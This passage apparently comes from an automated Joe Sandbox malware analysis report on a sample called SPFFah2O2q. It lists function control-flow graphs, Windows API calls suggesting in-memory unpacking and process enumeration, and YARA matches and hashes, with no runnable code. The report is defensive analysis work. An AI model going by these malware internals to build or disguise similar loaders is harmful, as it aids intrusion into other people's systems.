                                                                                                                                                                                                                                                                control_flow_graph 316 40acf0-40ad78 317 40ad80-40ad89 316->317 317->317 318 40ad8b-40ad9e 317->318 320 40b012-40b019 318->320 321 40ada5-40ada7 318->321 322 40b0e7-40b0f0 318->322 323 40b0f7-40b0fd 318->323 324 40adac-40afc7 318->324 325 40b09d-40b0b7 318->325 326 40b01e-40b096 call 407f00 318->326 327 40b0ff-40b10a 318->327 330 40b367-40b373 320->330 334 40b351-40b358 321->334 322->323 322->327 332 40b359-40b364 322->332 333 40b0be-40b0e2 call 43dbf0 322->333 336 40b341-40b344 322->336 337 40b1c4-40b1d1 322->337 338 40b268-40b289 call 43dbf0 322->338 339 40b1eb-40b20b 322->339 340 40b22b-40b235 322->340 341 40b330 322->341 342 40b212-40b224 322->342 343 40b332-40b335 322->343 344 40b295-40b2b4 322->344 345 40b2f5-40b31b 322->345 346 40b375 322->346 347 40b2d6-40b2df call 43c180 322->347 348 40b256-40b263 322->348 349 40b1d8-40b1df 322->349 350 40b33c 322->350 351 40b23c-40b254 call 43dbf0 322->351 352 40b37c 322->352 353 40b31d 322->353 328 40b141-40b164 323->328 335 40afd0-40aff2 324->335 325->332 325->333 326->322 326->323 326->325 326->327 326->332 326->333 326->336 326->337 326->338 326->339 326->340 326->341 326->342 326->343 326->344 326->345 326->346 326->347 326->348 326->349 326->350 326->351 326->352 326->353 329 40b110-40b13a 327->329 355 40b170-40b1a1 328->355 329->329 354 40b13c-40b13f 329->354 330->334 332->330 333->332 335->335 360 40aff4-40afff 335->360 368 40b34b 336->368 337->332 337->333 337->338 337->346 337->349 337->352 338->344 339->332 339->333 339->336 339->338 339->340 339->341 339->342 339->343 339->344 339->345 339->346 339->347 339->348 339->349 339->350 339->351 339->352 339->353 340->332 340->333 340->338 340->346 340->348 340->349 340->351 340->352 342->332 342->333 342->336 342->338 342->340 342->341 342->343 342->344 342->345 342->346 342->347 342->348 342->349 342->350 342->351 342->352 342->353 343->332 343->333 343->336 343->338 343->346 343->348 343->349 343->350 343->351 343->352 363 40b2bd-40b2cf 344->363 359 40b322-40b328 345->359 346->352 364 40b2e4-40b2ee 347->364 348->336 349->339 350->336 351->348 372 40b383 352->372 353->359 354->328 355->355 365 40b1a3-40b1bd 355->365 359->341 375 40b002-40b00b 360->375 363->332 363->333 363->336 363->338 363->341 363->343 363->345 363->346 363->347 363->348 363->349 363->350 363->351 363->352 363->353 364->332 364->333 364->336 364->338 364->341 364->343 364->345 364->346 364->348 364->349 364->350 364->351 364->352 364->353 365->332 365->333 365->336 365->337 365->338 365->339 365->340 365->341 365->342 365->343 365->344 365->345 365->346 365->347 365->348 365->349 365->350 365->351 365->352 365->353 368->334 372->372 375->320 375->322 375->323 375->325 375->326 375->327 375->332 375->333 375->336 375->337 375->338 375->339 375->340 375->341 375->342 375->343 375->344 375->345 375->346 375->347 375->348 375->349 375->350 375->351 375->352 375->353
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                                                                                                                                                                                                                                                • API String ID: 0-2986092683
                                                                                                                                                                                                                                                                • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                                • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85
                                                                                                                                                                                                                                                                Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 385 408850-408861 call 43bc60 388 408867-40888f call 408020 385->388 389 408acf-408ad1 ExitProcess 385->389 392 408890-4088cb 388->392 393 408904-408916 call 4354e0 392->393 394 4088cd-408902 392->394 397 408ab8-408abf 393->397 398 40891c-40893f GetCurrentProcessId GetCurrentThreadId 393->398 394->392 401 408ac1-408ac7 call 408030 397->401 402 408aca call 43c160 397->402 399 408941-408943 398->399 400 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 398->400 399->400 404 408a6b-408aac call 409b00 400->404 405 408a3d-408a69 400->405 401->402 402->389 404->397 410 408aae call 40c550 404->410 405->404 412 408ab3 call 40b390 410->412 412->397
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                                                                                                                                                                                  • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                                  • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                                                                                                                                                                                  • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3072701918-0
                                                                                                                                                                                                                                                                • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                                • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9
                                                                                                                                                                                                                                                                Function 004218A0 Relevance: 3.2, Strings: 2, Instructions: 655COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 425 4218a0-42192a call 414400 call 43e340 430 421931-421984 call 4143e0 call 43aa80 425->430 431 42192c 425->431 437 421986-421989 430->437 432 4220f7-422104 431->432 438 4219e7-4219ed 437->438 439 42198b-4219e5 437->439 440 4219ef-4219fa 438->440 439->437 441 421a01-421a17 440->441 442 4219fc 440->442 443 421a19-421aa4 441->443 444 421a1e-421a29 441->444 445 421ab6-421ab9 442->445 447 421aa6-421aaa 443->447 444->447 448 421a2b-421a95 call 43c1f0 444->448 449 421abb 445->449 450 421abd-421ac2 445->450 452 421aae-421ab1 447->452 453 421aac 447->453 456 421a9a-421aa2 448->456 449->450 454 421ac8-421adb 450->454 455 421ff9-422028 call 43aaa0 450->455 452->440 453->445 457 421add-421b19 454->457 463 42202a-42202d 455->463 456->447 460 421b20-421b3d 457->460 461 421b1b 457->461 462 421b3f-421b42 460->462 464 421cde 461->464 465 421b44-421b9a 462->465 466 421b9c-421bbe call 422110 462->466 467 42208b-422090 463->467 468 42202f-422089 463->468 469 421ce0-421ce4 464->469 465->462 466->464 481 421bc4-421be9 466->481 471 422092-422098 467->471 468->463 472 421ce6-421cec 469->472 473 421cee-421d05 call 43aa80 469->473 475 42209a 471->475 476 42209c-4220ae 471->476 477 421d26-421d29 472->477 492 421d07-421d19 473->492 493 421d1e-421d24 473->493 475->432 482 4220b2-4220b8 476->482 483 4220b0 476->483 479 421fd3-421fd8 477->479 480 421d2f-421d4f 477->480 487 421fe3-421fe9 479->487 488 421fda-421fe1 479->488 485 421d51-421d54 480->485 486 421beb-421bee 481->486 490 4220ba 482->490 491 4220bc-4220e8 call 43c1f0 482->491 489 4220eb-4220ee 483->489 494 421d93-421db6 485->494 495 421d56-421d91 485->495 496 421bf0-421c0a 486->496 497 421c0c-421c2d call 422110 486->497 498 421feb 487->498 488->498 500 4220f2-4220f5 489->500 501 4220f0 489->501 490->489 491->489 502 421fed-421fef 492->502 493->477 503 421db8-421dbb 494->503 495->485 496->486 512 421c34-421c4b 497->512 513 421c2f 497->513 498->502 500->471 501->432 502->457 506 421ff5-421ff7 502->506 507 421e19-421e1c 503->507 508 421dbd-421e17 503->508 506->455 511 421e1e-421e29 507->511 508->503 514 421e30-421e46 511->514 515 421e2b 511->515 516 421c4f-421cdc call 408020 call 414050 call 408030 512->516 517 421c4d 512->517 513->469 519 421e48-421ed2 514->519 520 421e4d-421e58 514->520 518 421ee4-421eea 515->518 516->469 517->516 523 421eee-421f0b 518->523 524 421eec 518->524 526 421ed4-421ed8 519->526 520->526 527 421e5a-421ec3 call 43c1f0 520->527 531 421f0d-421f10 523->531 524->523 529 421eda 526->529 530 421edc-421edf 526->530 536 421ec8-421ed0 527->536 529->518 530->511 534 421f12-421f66 531->534 535 421f68-421f6f 531->535 534->531 537 421f71-421f75 535->537 538 421f9f-421fa2 535->538 536->526 542 421f77-421f7e 537->542 539 421fa4-421fbd call 43aaa0 538->539 540 421fbf-421fc4 538->540 544 421fc6-421fc9 539->544 540->544 546 421f80-421f8c 542->546 547 421f8e-421f91 542->547 544->479 549 421fcb-421fd1 544->549 546->542 551 421f93-421f99 547->551 552 421f9b-421f9d 547->552 549->502 551->552 552->538
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !@$,
                                                                                                                                                                                                                                                                • API String ID: 0-2321553346
                                                                                                                                                                                                                                                                • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                                • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
                                                                                                                                                                                                                                                                Function 020C07A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 554 20c07a6-20c07bf 555 20c07c1-20c07c3 554->555 556 20c07ca-20c07d6 CreateToolhelp32Snapshot 555->556 557 20c07c5 555->557 558 20c07d8-20c07de 556->558 559 20c07e6-20c07f3 Module32First 556->559 557->556 558->559 566 20c07e0-20c07e4 558->566 560 20c07fc-20c0804 559->560 561 20c07f5-20c07f6 call 20c0465 559->561 564 20c07fb 561->564 564->560 566->555 566->559
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020C07CE
                                                                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 020C07EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20c0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                • Instruction ID: d96b2f4417ce84138222a2ad4c26a66549524e3a63614b9a8057f41c9d5a29bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F0C271500311AFE7203BF5988CB6F76EDAF49665F20023CE642910C0DB70E8059A60
                                                                                                                                                                                                                                                                Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,+*)
                                                                                                                                                                                                                                                                • API String ID: 0-3529585375
                                                                                                                                                                                                                                                                • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                                • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                                                                                                                                                                                                Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: o`
                                                                                                                                                                                                                                                                • API String ID: 0-3993896143
                                                                                                                                                                                                                                                                • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                                                                                                                                                                                                                                                Function 00422190 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                                                                                                                                                                                                                                                Function 020F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 188 20f003c-20f0047 189 20f004c-20f0263 call 20f0a3f call 20f0e0f call 20f0d90 VirtualAlloc 188->189 190 20f0049 188->190 205 20f028b-20f0292 189->205 206 20f0265-20f0289 call 20f0a69 189->206 190->189 208 20f02a1-20f02b0 205->208 210 20f02ce-20f03c2 VirtualProtect call 20f0cce call 20f0ce7 206->210 208->210 211 20f02b2-20f02cc 208->211 217 20f03d1-20f03e0 210->217 211->208 218 20f0439-20f04b8 VirtualFree 217->218 219 20f03e2-20f0437 call 20f0ce7 217->219 221 20f04be-20f04cd 218->221 222 20f05f4-20f05fe 218->222 219->217 224 20f04d3-20f04dd 221->224 225 20f077f-20f0789 222->225 226 20f0604-20f060d 222->226 224->222 230 20f04e3-20f0505 LoadLibraryA 224->230 228 20f078b-20f07a3 225->228 229 20f07a6-20f07b0 225->229 226->225 231 20f0613-20f0637 226->231 228->229 233 20f086e-20f08be LoadLibraryA 229->233 234 20f07b6-20f07cb 229->234 235 20f0517-20f0520 230->235 236 20f0507-20f0515 230->236 232 20f063e-20f0648 231->232 232->225 238 20f064e-20f065a 232->238 244 20f08c7-20f08f9 233->244 239 20f07d2-20f07d5 234->239 237 20f0526-20f0547 235->237 236->237 242 20f054d-20f0550 237->242 238->225 243 20f0660-20f066a 238->243 240 20f07d7-20f07e0 239->240 241 20f0824-20f0833 239->241 245 20f07e4-20f0822 240->245 246 20f07e2 240->246 250 20f0839-20f083c 241->250 247 20f0556-20f056b 242->247 248 20f05e0-20f05ef 242->248 249 20f067a-20f0689 243->249 251 20f08fb-20f0901 244->251 252 20f0902-20f091d 244->252 245->239 246->241 253 20f056f-20f057a 247->253 254 20f056d 247->254 248->224 255 20f068f-20f06b2 249->255 256 20f0750-20f077a 249->256 250->233 257 20f083e-20f0847 250->257 251->252 258 20f057c-20f0599 253->258 259 20f059b-20f05bb 253->259 254->248 260 20f06ef-20f06fc 255->260 261 20f06b4-20f06ed 255->261 256->232 262 20f084b-20f086c 257->262 263 20f0849 257->263 271 20f05bd-20f05db 258->271 259->271 265 20f06fe-20f0748 260->265 266 20f074b 260->266 261->260 262->250 263->233 265->266 266->249 271->242
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020F024D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14
                                                                                                                                                                                                                                                                Function 020F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 567 20f0e0f-20f0e24 SetErrorMode * 2 568 20f0e2b-20f0e2c 567->568 569 20f0e26 567->569 569->568
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5
                                                                                                                                                                                                                                                                Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 619 43c2c8-43c2d6 620 43c2e0-43c2fd 619->620 620->620 621 43c2ff-43ccb9 GetForegroundWindow call 43e110 620->621 624 43ccbe-43ccdf 621->624
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                                • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
                                                                                                                                                                                                                                                                Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                                                                                                                                                                                • Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
